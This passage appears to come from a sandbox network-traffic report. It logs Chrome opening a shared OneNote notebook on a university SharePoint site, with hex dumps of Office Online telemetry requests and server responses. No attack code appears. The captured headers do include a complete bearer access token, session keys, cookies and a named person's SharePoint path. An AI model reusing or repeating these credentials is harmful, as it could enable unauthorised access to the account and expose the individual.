                                                Data Ascii: e,"82D45BF4-9848-4C70-B95B-C5C4836EDCB5":true,"BC837400-D147-4378-8D01-F875B371C68E":true,"645ADD44-A992-407C-8130-4198EBDF03CD":true,"87CDDE00-26A7-4D6A-A129-4BB4CF092E04":true,"1630E1F6-BF88-4F6F-9327-C5D9FE2C174F":true,"A21172C9-12E3-4F3E-B3C6-5E7E5898
                                                2022-10-03 13:38:16 UTC66INData Raw: 74 74 70 73 3a 5c 75 30 30 32 66 5c 75 30 30 32 66 69 6e 73 61 63 65 6e 74 72 65 2d 6d 79 2e 73 68 61 72 65 70 6f 69 6e 74 2e 63 6f 6d 5c 75 30 30 32 66 70 65 72 73 6f 6e 61 6c 5c 75 30 30 32 66 63 68 72 69 73 74 65 6c 5f 63 68 65 76 65 72 65 61 75 5f 69 6e 73 61 2d 63 76 6c 5f 66 72 5c 75 30 30 32 66 5f 6c 61 79 6f 75 74 73 5c 75 30 30 32 66 31 35 5c 75 30 30 32 66 44 6f 63 2e 61 73 70 78 3f 73 6f 75 72 63 65 64 6f 63 3d 7b 35 63 36 32 37 33 32 34 2d 62 34 65 36 2d 34 39 36 37 2d 61 33 31 61 2d 35 63 32 65 32 37 36 37 61 32 61 30 7d 5c 75 30 30 32 36 61 63 74 69 6f 6e 3d 64 65 66 61 75 6c 74 5c 75 30 30 32 36 73 6c 72 69 64 3d 65 36 30 33 36 62 61 30 2d 36 30 65 64 2d 35 30 30 30 2d 33 62 35 36 2d 65 63 36 66 33 32 63 61 66 61 66 62 5c 75 30 30 32 36 6f
                                                Data Ascii: ttps:\u002f\u002finsacentre-my.sharepoint.com\u002fpersonal\u002fchristel_chevereau_insa-cvl_fr\u002f_layouts\u002f15\u002fDoc.aspx?sourcedoc={5c627324-b4e6-4967-a31a-5c2e2767a2a0}\u0026action=default\u0026slrid=e6036ba0-60ed-5000-3b56-ec6f32cafafb\u0026o
                                                2022-10-03 13:38:16 UTC74INData Raw: 69 74 69 61 6c 69 7a 65 57 6f 70 69 50 65 6e 64 69 6e 67 28 74 68 69 73 2e 5f 61 70 70 4e 61 6d 65 2c 20 77 6f 70 69 44 6f 63 43 6f 6e 74 65 78 74 2e 49 73 50 72 61 67 75 65 44 6f 63 75 6d 65 6e 74 2c 20 74 68 69 73 2e 5f 69 6e 69 74 50 61 72 61 6d 73 29 3b 0d 0a 09 09 09 09 09 69 66 20 28 21 74 68 69 73 2e 5f 77 6f 70 69 50 65 6e 64 69 6e 67 41 70 70 29 20 7b 0d 0a 09 09 09 09 09 09 74 68 72 6f 77 20 22 46 61 69 6c 65 64 20 74 6f 20 69 6e 69 74 69 61 6c 69 7a 65 20 57 41 43 2e 22 3b 0d 0a 09 09 09 09 09 7d 0d 0a 09 09 09 09 09 74 68 69 73 2e 5f 73 74 61 74 65 20 3d 20 31 20 3b 0d 0a 09 09 09 09 7d 0d 0a 09 09 09 09 63 61 74 63 68 20 28 65 72 72 29 20 7b 0d 0a 09 09 09 09 09 74 68 69 73 2e 5f 73 63 72 69 70 74 45 72 72 6f 72 20 3d 20 28 65 72 72 20 26 26
                                                Data Ascii: itializeWopiPending(this._appName, wopiDocContext.IsPragueDocument, this._initParams);if (!this._wopiPendingApp) {throw "Failed to initialize WAC.";}this._state = 1 ;}catch (err) {this._scriptError = (err &&
                                                2022-10-03 13:38:16 UTC82INData Raw: 73 68 61 32 35 36 2d 37 31 31 78 66 4d 35 58 6f 4e 6f 53 4b 52 4d 45 64 38 71 53 47 2b 77 4d 32 34 59 31 79 4c 56 57 52 45 50 7a 47 34 57 31 6a 56 67 3d 22 2c 22 6f 64 73 70 2e 72 65 61 63 74 2e 6c 69 62 2d 30 37 34 62 31 30 31 36 2e 6a 73 22 3a 22 73 68 61 32 35 36 2d 69 6e 4f 69 70 32 48 70 52 77 38 54 30 37 56 78 39 44 4d 50 32 6c 6f 36 6b 37 45 63 73 69 41 58 31 39 6c 65 32 51 6f 64 72 31 38 3d 22 2c 22 6f 64 73 70 2e 6b 6e 6f 63 6b 6f 75 74 2e 6c 69 62 2d 36 35 62 62 62 63 62 66 2e 6a 73 22 3a 22 73 68 61 32 35 36 2d 5a 68 72 62 6f 32 73 37 45 75 4c 46 4a 50 6b 6e 62 31 46 32 38 45 57 64 37 61 34 45 54 45 4d 6a 51 51 52 52 4b 51 75 32 73 38 38 3d 22 2c 22 6f 64 73 70 2e 61 72 69 61 2e 6c 69 62 2d 62 64 39 30 32 38 34 34 2e 6a 73 22 3a 22 73 68 61 32
                                                Data Ascii: sha256-711xfM5XoNoSKRMEd8qSG+wM24Y1yLVWREPzG4W1jVg=","odsp.react.lib-074b1016.js":"sha256-inOip2HpRw8T07Vx9DMP2lo6k7EcsiAX19le2Qodr18=","odsp.knockout.lib-65bbbcbf.js":"sha256-Zhrbo2s7EuLFJPknb1F28EWd7a4ETEMjQQRRKQu2s88=","odsp.aria.lib-bd902844.js":"sha2


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                30192.168.2.34983013.107.6.171443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampkBytes transferredDirectionData
                                                2022-10-03 13:38:35 UTC538OUTPOST /o/RemoteUls.ashx?build=16.0.15707.41015&waccluster=GEU2 HTTP/1.1
                                                Host: euc-onenote.officeapps.live.com
                                                Connection: keep-alive
                                                Content-Length: 56652
                                                sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                X-WacFrontEnd: AM1PEPF000094C7
                                                X-OfficeVersion: 16.0.15707.41015
                                                X-Key: 5CkbCfV/c5WRPlfo2bTVsG0FKIqu826w6sof/5159dg=,638004010975601703
                                                X-WacUserAgent: MSWACONSync
                                                X-bULS-SuppressionETag: D4C663A7BB170EC4D6D0C2C9132C150D3CBB915A
                                                X-AccessTokenTtl: 1664840296804
                                                X-Requested-With: XMLHttpRequest
                                                X-xhr: 1
                                                sec-ch-ua-platform: "Windows"
                                                haep: 1
                                                X-AccessToken: eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6ImFrUFRFTzRYU0N4c3hXOTBHMl9Zd1lWRGdIYyJ9.eyJhdWQiOiJ3b3BpL2luc2FjZW50cmUtbXkuc2hhcmVwb2ludC5jb21AZjc0MjE0NTAtZGYxNi00NzE0LWFkYTEtMzk1MzkwY2I5MWQzIiwiaXNzIjoiMDAwMDAwMDMtMDAwMC0wZmYxLWNlMDAtMDAwMDAwMDAwMDAwQDkwMTQwMTIyLTg1MTYtMTFlMS04ZWZmLTQ5MzA0OTI0MDE5YiIsIm5iZiI6IjE2NjQ4MDQyOTYiLCJleHAiOiIxNjY0ODQwMjk2IiwibmFtZWlkIjoiMCMuZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGMyYmRlM2RjNmYxYmRkOTJiMTQ2ZmVkN2E2ZDI2NzNiZTZhYmEzOGU4MmRhMGYzNzhlMDNmODAzYTE2MTY0YyIsIm5paSI6Im1pY3Jvc29mdC5zaGFyZXBvaW50IiwiaXN1c2VyIjoidHJ1ZSIsImNhY2hla2V5IjoiMGguZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGMyYmRlM2RjNmYxYmRkOTJiMTQ2ZmVkN2E2ZDI2NzNiZTZhYmEzOGU4MmRhMGYzNzhlMDNmODAzYTE2MTY0YyIsInNoYXJpbmdpZCI6IlkzbSt5S21nQWt1SEsrbFFjWjJSL3ciLCJpc2xvb3BiYWNrIjoiVHJ1ZSIsImFwcGN0eCI6IjVjNjI3MzI0YjRlNjQ5NjdhMzFhNWMyZTI3NjdhMmEwO01NSW9kVHVrMnhacDRTTFIyUlQ3cU9HcTNsTT07RGVmYXVsdDsxMmNlNzM1ZTFmNGM0YjkyOTQzNGQ5Nzk4YzJmY2JiOTs7VHJ1ZTs7OzA7ZTcwMzZiYTAtNDAwNC01MDAwLTQ3MDQtOGM3OTc3Zjk2M2M5In0.EWb66LDcPK9or86SYiXEnS8X85go_GF6jrytmNe-VM0DP1xedkdH8-P7maQkiGV1uoKn2Q3P4K07W8GXPgYZ5y8fXzywqlJykkoJzCJPRAx6O_cBiZszwxDu1rJtgjSTldsdPBQi-x4isn_tXs1kVY3k0U38ib-UTDhESo5GkrQ59aM3v5L0NqOv7JFyPd5UFya1amQrzflYMZLjlIR7Cpl8sbK80iNccduMe_YJ8j12fHoZippN9rN6taMKDu9wT0A9JTtAxplzwDJbTKBuRr6bA7EzroK8GpTlnMKJldwuHWyPyVYQHIAwW8osIl11pJ4nzIiwd96ynH3CffKLmQ
                                                X-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                X-UserType: WOPI
                                                X-IsCoauthSession: true
                                                X-WacCluster: GEU2
                                                Accept: */*
                                                Origin: https://euc-onenote.officeapps.live.com
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Referer: https://euc-onenote.officeapps.live.com/o/onenoteframe.aspx?ui=fr%2DFR&rs=fr%2DFR&wopisrc=https%3A%2F%2Finsacentre-my.sharepoint.com%2Fpersonal%2Fchristel_chevereau_insa-cvl_fr%2F_vti_bin%2Fwopi.ashx%2Ffolders%2F5c627324b4e64967a31a5c2e2767a2a0&wdenableroaming=1&mscc=0&wdodb=1&hid=E7036BA0-4004-5000-4704-8C7977F963C9&wdorigin=Sharing&wdhostclicktime=1664836694371&jsapi=1&jsapiver=v1&newsession=1&corrid=f4fb35ab-872b-4831-80cd-60f1741f9c31&usid=f4fb35ab-872b-4831-80cd-60f1741f9c31&sftc=1&cac=1&mtf=1&sfp=1&readonly=1&wdredirectionreason=Force_SingleStepBoot&rct=Medium&ctp=LeastProtected
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: BIGipCookie=000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000; PrivNote=-1; WacUPToggleState=%7B%22CCS%22%3A0%7D; GEU2-ARRAffinity=6d4bbee26ee2cd267faa982251fa1253c2809c10aef235fbcf94243ec19857ca
                                                2022-10-03 13:38:35 UTC541OUTData Raw: 7b 22 54 22 3a 31 36 36 34 38 33 36 37 30 35 37 35 39 2c 22 4c 22 3a 5b 7b 22 47 22 3a 35 33 39 30 34 32 32 37 33 2c 22 54 22 3a 31 36 35 2c 22 4d 22 3a 22 53 68 61 72 65 64 55 78 47 61 74 65 3a 74 72 75 65 2c 20 54 65 73 74 55 78 46 6c 69 67 68 74 3a 66 61 6c 73 65 22 2c 22 43 22 3a 33 34 30 2c 22 44 22 3a 31 35 7d 2c 7b 22 47 22 3a 35 39 34 38 39 32 39 32 38 2c 22 54 22 3a 33 38 36 2c 22 4d 22 3a 22 7b 5c 22 74 79 70 65 5c 22 3a 5c 22 66 75 6e 63 74 69 6f 6e 45 78 65 63 75 74 69 6f 6e 5c 22 2c 5c 22 6b 65 79 5c 22 3a 5c 22 53 75 69 74 65 48 65 61 64 65 72 50 6c 61 63 65 68 6f 6c 64 65 72 3a 4d 65 61 73 75 72 65 43 6f 6d 70 6f 6e 65 6e 74 73 5c 22 2c 5c 22 73 74 61 72 74 54 69 6d 65 5c 22 3a 38 35 31 37 2e 35 2c 5c 22 65 6e 64 54 69 6d 65 5c 22 3a 38 37
                                                Data Ascii: {"T":1664836705759,"L":[{"G":539042273,"T":165,"M":"SharedUxGate:true, TestUxFlight:false","C":340,"D":15},{"G":594892928,"T":386,"M":"{\"type\":\"functionExecution\",\"key\":\"SuiteHeaderPlaceholder:MeasureComponents\",\"startTime\":8517.5,\"endTime\":87
                                                2022-10-03 13:38:35 UTC557OUTData Raw: 5c 22 44 6f 6d 61 69 6e 4c 6f 6f 6b 75 70 45 6e 64 5c 22 3a 5c 22 35 33 35 2e 36 5c 22 2c 5c 22 43 6f 6e 6e 65 63 74 53 74 61 72 74 5c 22 3a 5c 22 35 33 35 2e 36 5c 22 2c 5c 22 43 6f 6e 6e 65 63 74 45 6e 64 5c 22 3a 5c 22 36 31 38 2e 37 5c 22 2c 5c 22 53 65 63 75 72 65 43 6f 6e 6e 65 63 74 69 6f 6e 53 74 61 72 74 5c 22 3a 5c 22 35 33 36 2e 33 5c 22 2c 5c 22 52 65 71 75 65 73 74 53 74 61 72 74 5c 22 3a 5c 22 36 31 38 2e 38 5c 22 2c 5c 22 52 65 73 70 6f 6e 73 65 53 74 61 72 74 5c 22 3a 5c 22 36 37 37 2e 39 5c 22 2c 5c 22 52 65 73 70 6f 6e 73 65 45 6e 64 5c 22 3a 5c 22 39 35 33 2e 35 5c 22 2c 5c 22 44 65 63 6f 64 65 64 42 6f 64 79 53 69 7a 65 5c 22 3a 5c 22 38 36 38 34 32 5c 22 2c 5c 22 45 6e 63 6f 64 65 64 42 6f 64 79 53 69 7a 65 5c 22 3a 5c 22 38 36 38 34
                                                Data Ascii: \"DomainLookupEnd\":\"535.6\",\"ConnectStart\":\"535.6\",\"ConnectEnd\":\"618.7\",\"SecureConnectionStart\":\"536.3\",\"RequestStart\":\"618.8\",\"ResponseStart\":\"677.9\",\"ResponseEnd\":\"953.5\",\"DecodedBodySize\":\"86842\",\"EncodedBodySize\":\"8684
                                                2022-10-03 13:38:35 UTC573OUTData Raw: 6f 6e 65 6e 6f 74 65 2d 31 35 2e 63 64 6e 2e 6f 66 66 69 63 65 2e 6e 65 74 2f 6f 2f 73 2f 31 36 31 35 37 30 37 34 31 30 31 35 5f 41 70 70 5f 53 63 72 69 70 74 73 2f 6e 61 76 69 67 61 74 69 6f 6e 2e 6d 69 6e 2e 6a 73 5c 22 2c 5c 22 49 6e 69 74 69 61 74 6f 72 54 79 70 65 5c 22 3a 5c 22 73 63 72 69 70 74 5c 22 2c 5c 22 52 65 64 69 72 65 63 74 53 74 61 72 74 5c 22 3a 5c 22 30 5c 22 2c 5c 22 52 65 64 69 72 65 63 74 45 6e 64 5c 22 3a 5c 22 30 5c 22 2c 5c 22 46 65 74 63 68 53 74 61 72 74 5c 22 3a 5c 22 36 32 34 33 5c 22 2c 5c 22 44 6f 6d 61 69 6e 4c 6f 6f 6b 75 70 53 74 61 72 74 5c 22 3a 5c 22 36 32 39 36 2e 36 5c 22 2c 5c 22 44 6f 6d 61 69 6e 4c 6f 6f 6b 75 70 45 6e 64 5c 22 3a 5c 22 36 32 39 36 2e 37 5c 22 2c 5c 22 43 6f 6e 6e 65 63 74 53 74 61 72 74 5c 22 3a
                                                Data Ascii: onenote-15.cdn.office.net/o/s/161570741015_App_Scripts/navigation.min.js\",\"InitiatorType\":\"script\",\"RedirectStart\":\"0\",\"RedirectEnd\":\"0\",\"FetchStart\":\"6243\",\"DomainLookupStart\":\"6296.6\",\"DomainLookupEnd\":\"6296.7\",\"ConnectStart\":
                                                2022-10-03 13:38:35 UTC589OUTData Raw: 3a 20 6d 73 6f 5f 74 65 6c 6c 4d 65 53 65 72 76 69 63 65 2c 20 65 6e 61 62 6c 65 64 20 6f 72 20 6e 6f 74 3a 20 74 72 75 65 2c 20 62 79 20 70 6f 6c 69 63 79 3a 20 43 6f 6e 74 72 6f 6c 6c 65 72 43 6f 6e 6e 65 63 74 65 64 53 65 72 76 69 63 65 73 45 6e 61 62 6c 65 64 22 2c 22 43 22 3a 33 30 30 34 2c 22 44 22 3a 35 30 7d 2c 7b 22 47 22 3a 35 30 36 35 31 36 36 37 2c 22 54 22 3a 39 33 36 34 2c 22 4d 22 3a 22 43 6c 6f 75 64 50 6f 6c 69 63 79 53 65 74 74 69 6e 67 73 48 65 6c 70 65 72 2e 47 65 74 42 6f 6f 6c 65 61 6e 50 6f 6c 69 63 79 53 65 74 74 69 6e 67 3a 20 70 6f 6c 69 63 79 3a 20 43 6f 6e 74 72 6f 6c 6c 65 72 43 6f 6e 6e 65 63 74 65 64 53 65 72 76 69 63 65 73 45 6e 61 62 6c 65 64 2c 20 76 61 6c 75 65 3a 20 74 72 75 65 22 2c 22 43 22 3a 33 30 30 34 2c 22 44 22
                                                Data Ascii: : mso_tellMeService, enabled or not: true, by policy: ControllerConnectedServicesEnabled","C":3004,"D":50},{"G":50651667,"T":9364,"M":"CloudPolicySettingsHelper.GetBooleanPolicySetting: policy: ControllerConnectedServicesEnabled, value: true","C":3004,"D"
                                                2022-10-03 13:38:35 UTC601INHTTP/1.1 200 OK
                                                Cache-Control: private
                                                Content-Type: text/plain
                                                P3P: CP="CAO DSP COR ADMa DEV CONi TELi CUR PSA PSD TAI IVDi OUR SAMi BUS DEM NAV STA UNI COM INT PHY ONL FIN PUR"
                                                Set-Cookie:
                                                X-CorrelationId: d7d1603c-5c13-4936-a0a0-a393c8ad818a
                                                X-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31
                                                Strict-Transport-Security: max-age=31536000
                                                Timing-Allow-Origin: *
                                                X-OfficeFE: AM1PEPF000006C4
                                                X-OfficeVersion: 16.0.15707.41015
                                                X-OfficeCluster: GEU2
                                                Access-Control-Allow-Origin: https://euc-onenote.officeapps.live.com
                                                Access-Control-Expose-Headers: X-EndSession, X-CorrelationId, X-OfficeFE, X-NewKey, X-bULS-SuppressionETag, X-bULS-SuppressedTags
                                                Cross-Origin-Resource-Policy: cross-origin
                                                X-bULS-SuppressionETag: D4C663A7BB170EC4D6D0C2C9132C150D3CBB915A
                                                X-Content-Type-Options: nosniff
                                                X-Download-Options: noopen
                                                Content-Disposition: attachment
                                                X-OFFICEFD: AM1PEPF000006C4
                                                X-Cache: CONFIG_NOCACHE
                                                X-MSEdge-Flight: 2i49=afd_wacinfra4,2i4a=afd_wacinfra5
                                                X-MSEdge-Features: typeheadertest,afd_waccluster,afd_wordslice_control,afd_wacinfra4,afd_wacinfra5
                                                X-MSEdge-Ref: Ref A: 3EF6B24826D1404FBB49EED14770A7C0 Ref B: AMS231032607007 Ref C: 2022-10-03T13:38:35Z
                                                Date: Mon, 03 Oct 2022 13:38:35 GMT
                                                Connection: close
                                                Content-Length: 0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                31192.168.2.34983213.107.6.171443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampkBytes transferredDirectionData
                                                2022-10-03 13:38:35 UTC597OUTPOST /o/RemoteUls.ashx?build=16.0.15707.41015&waccluster=GEU2 HTTP/1.1
                                                Host: euc-onenote.officeapps.live.com
                                                Connection: keep-alive
                                                Content-Length: 1482
                                                sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                X-WacFrontEnd: AM1PEPF000094C7
                                                X-OfficeVersion: 16.0.15707.41015
                                                X-Key: 5CkbCfV/c5WRPlfo2bTVsG0FKIqu826w6sof/5159dg=,638004010975601703
                                                X-WacUserAgent: MSWACONSync
                                                X-bULS-SuppressionETag: D4C663A7BB170EC4D6D0C2C9132C150D3CBB915A
                                                X-AccessTokenTtl: 1664840296804
                                                X-Requested-With: XMLHttpRequest
                                                X-xhr: 1
                                                sec-ch-ua-platform: "Windows"
                                                haep: 1
                                                X-AccessToken: eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6ImFrUFRFTzRYU0N4c3hXOTBHMl9Zd1lWRGdIYyJ9.eyJhdWQiOiJ3b3BpL2luc2FjZW50cmUtbXkuc2hhcmVwb2ludC5jb21AZjc0MjE0NTAtZGYxNi00NzE0LWFkYTEtMzk1MzkwY2I5MWQzIiwiaXNzIjoiMDAwMDAwMDMtMDAwMC0wZmYxLWNlMDAtMDAwMDAwMDAwMDAwQDkwMTQwMTIyLTg1MTYtMTFlMS04ZWZmLTQ5MzA0OTI0MDE5YiIsIm5iZiI6IjE2NjQ4MDQyOTYiLCJleHAiOiIxNjY0ODQwMjk2IiwibmFtZWlkIjoiMCMuZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGMyYmRlM2RjNmYxYmRkOTJiMTQ2ZmVkN2E2ZDI2NzNiZTZhYmEzOGU4MmRhMGYzNzhlMDNmODAzYTE2MTY0YyIsIm5paSI6Im1pY3Jvc29mdC5zaGFyZXBvaW50IiwiaXN1c2VyIjoidHJ1ZSIsImNhY2hla2V5IjoiMGguZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGMyYmRlM2RjNmYxYmRkOTJiMTQ2ZmVkN2E2ZDI2NzNiZTZhYmEzOGU4MmRhMGYzNzhlMDNmODAzYTE2MTY0YyIsInNoYXJpbmdpZCI6IlkzbSt5S21nQWt1SEsrbFFjWjJSL3ciLCJpc2xvb3BiYWNrIjoiVHJ1ZSIsImFwcGN0eCI6IjVjNjI3MzI0YjRlNjQ5NjdhMzFhNWMyZTI3NjdhMmEwO01NSW9kVHVrMnhacDRTTFIyUlQ3cU9HcTNsTT07RGVmYXVsdDsxMmNlNzM1ZTFmNGM0YjkyOTQzNGQ5Nzk4YzJmY2JiOTs7VHJ1ZTs7OzA7ZTcwMzZiYTAtNDAwNC01MDAwLTQ3MDQtOGM3OTc3Zjk2M2M5In0.EWb66LDcPK9or86SYiXEnS8X85go_GF6jrytmNe-VM0DP1xedkdH8-P7maQkiGV1uoKn2Q3P4K07W8GXPgYZ5y8fXzywqlJykkoJzCJPRAx6O_cBiZszwxDu1rJtgjSTldsdPBQi-x4isn_tXs1kVY3k0U38ib-UTDhESo5GkrQ59aM3v5L0NqOv7JFyPd5UFya1amQrzflYMZLjlIR7Cpl8sbK80iNccduMe_YJ8j12fHoZippN9rN6taMKDu9wT0A9JTtAxplzwDJbTKBuRr6bA7EzroK8GpTlnMKJldwuHWyPyVYQHIAwW8osIl11pJ4nzIiwd96ynH3CffKLmQ
                                                X-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                X-UserType: WOPI
                                                X-IsCoauthSession: true
                                                X-WacCluster: GEU2
                                                Accept: */*
                                                Origin: https://euc-onenote.officeapps.live.com
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Referer: https://euc-onenote.officeapps.live.com/o/onenoteframe.aspx?ui=fr%2DFR&rs=fr%2DFR&wopisrc=https%3A%2F%2Finsacentre-my.sharepoint.com%2Fpersonal%2Fchristel_chevereau_insa-cvl_fr%2F_vti_bin%2Fwopi.ashx%2Ffolders%2F5c627324b4e64967a31a5c2e2767a2a0&wdenableroaming=1&mscc=0&wdodb=1&hid=E7036BA0-4004-5000-4704-8C7977F963C9&wdorigin=Sharing&wdhostclicktime=1664836694371&jsapi=1&jsapiver=v1&newsession=1&corrid=f4fb35ab-872b-4831-80cd-60f1741f9c31&usid=f4fb35ab-872b-4831-80cd-60f1741f9c31&sftc=1&cac=1&mtf=1&sfp=1&readonly=1&wdredirectionreason=Force_SingleStepBoot&rct=Medium&ctp=LeastProtected
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: BIGipCookie=000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000; PrivNote=-1; WacUPToggleState=%7B%22CCS%22%3A0%7D; GEU2-ARRAffinity=6d4bbee26ee2cd267faa982251fa1253c2809c10aef235fbcf94243ec19857ca
                                                2022-10-03 13:38:35 UTC600OUTData Raw: 7b 22 54 22 3a 31 36 36 34 38 33 36 37 31 35 34 39 39 2c 22 4c 22 3a 5b 7b 22 47 22 3a 33 36 35 30 35 35 30 31 2c 22 54 22 3a 35 38 2c 22 4d 22 3a 22 47 65 74 45 64 75 50 72 6f 70 65 72 74 69 65 73 20 72 65 71 75 65 73 74 20 66 61 69 6c 65 64 20 77 69 74 68 20 61 74 74 65 6d 70 74 20 34 2c 20 73 74 61 74 75 73 20 39 2c 20 72 65 73 70 6f 6e 73 65 44 61 74 61 20 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 5c 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 5c 22 20 5c 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 5c 22 3e 5c 72 5c 6e 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 5c 22 68 74 74
                                                Data Ascii: {"T":1664836715499,"L":[{"G":36505501,"T":58,"M":"GetEduProperties request failed with attempt 4, status 9, responseData <!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\">\r\n<html xmlns=\"htt
                                                2022-10-03 13:38:35 UTC602INHTTP/1.1 200 OK
                                                Cache-Control: private
                                                Content-Type: text/plain
                                                P3P: CP="CAO DSP COR ADMa DEV CONi TELi CUR PSA PSD TAI IVDi OUR SAMi BUS DEM NAV STA UNI COM INT PHY ONL FIN PUR"
                                                Set-Cookie:
                                                X-CorrelationId: d6680de7-0805-46a4-be3b-72bb1154fed9
                                                X-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31
                                                Strict-Transport-Security: max-age=31536000
                                                Timing-Allow-Origin: *
                                                X-OfficeFE: AM1PEPF000006BB
                                                X-OfficeVersion: 16.0.15707.41015
                                                X-OfficeCluster: GEU2
                                                Access-Control-Allow-Origin: https://euc-onenote.officeapps.live.com
                                                Access-Control-Expose-Headers: X-EndSession, X-CorrelationId, X-OfficeFE, X-NewKey, X-bULS-SuppressionETag, X-bULS-SuppressedTags
                                                Cross-Origin-Resource-Policy: cross-origin
                                                X-bULS-SuppressionETag: D4C663A7BB170EC4D6D0C2C9132C150D3CBB915A
                                                X-Content-Type-Options: nosniff
                                                X-Download-Options: noopen
                                                Content-Disposition: attachment
                                                X-OFFICEFD: AM1PEPF000006BB
                                                X-Cache: CONFIG_NOCACHE
                                                X-MSEdge-Flight: 2i49=afd_wacinfra4,2i4a=afd_wacinfra5
                                                X-MSEdge-Features: typeheadertest,afd_waccluster,afd_wacinfra4,afd_wacinfra5
                                                X-MSEdge-Ref: Ref A: E7E3E0A7F5FE4CFBA64FFA4378407228 Ref B: AMS231032602045 Ref C: 2022-10-03T13:38:35Z
                                                Date: Mon, 03 Oct 2022 13:38:35 GMT
                                                Connection: close
                                                Content-Length: 0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                32192.168.2.34983340.90.128.21443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampkBytes transferredDirectionData
                                                2022-10-03 13:38:35 UTC604OUTGET /mydata/myprofile/expressionprofile/profilephoto:UserTileStatic,UserTileSmall/MeControlMediumUserTile?ck=1&ex=24&fofoff=1&sc=1664836715499 HTTP/1.1
                                                Host: storage.live.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                Sec-Fetch-Site: same-site
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: image
                                                Referer: https://euc-onenote.officeapps.live.com/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2022-10-03 13:38:35 UTC604INHTTP/1.1 302 Found
                                                Content-Length: 0
                                                Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&ct=1664804315&rver=7.3.6962.0&wp=MBI_SSL&wreply=https:%2F%2Fstorage.live.com%2Fstorageservice%2Fpassport%2Fauth.aspx%3Fsru%3Dhttps:%252f%252fstorage.live.com%252fmydata%252fmyprofile%252fexpressionprofile%252fprofilephoto:UserTileStatic%252cUserTileSmall%252fMeControlMediumUserTile&lc=1033&id=63539
                                                P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                X-MSNSERVER: DB1PPF2A8D42037
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                MS-CV: AjpWZ2mPSEGq+eh4UyOfig.0
                                                X-QosStats: {"ApiId":0,"ResultType":2,"SourcePropertyId":0,"TargetPropertyId":42}
                                                X-ThrowSite: 4212.9205
                                                X-ClientErrorCode: PassportAuthFail
                                                X-ErrorCodeChain: Unauthenticated
                                                X-AsmVersion: UNKNOWN; 19.1008.920.2005
                                                Date: Mon, 03 Oct 2022 13:38:35 GMT
                                                Connection: close


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                33192.168.2.34988613.107.6.171443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampkBytes transferredDirectionData
                                                2022-10-03 13:38:47 UTC605OUTGET /o/AppSettingsHandler.ashx?app=OneNote&usid=f4fb35ab-872b-4831-80cd-60f1741f9c31&build=16.0.15707.41015 HTTP/1.1
                                                Host: euc-onenote.officeapps.live.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
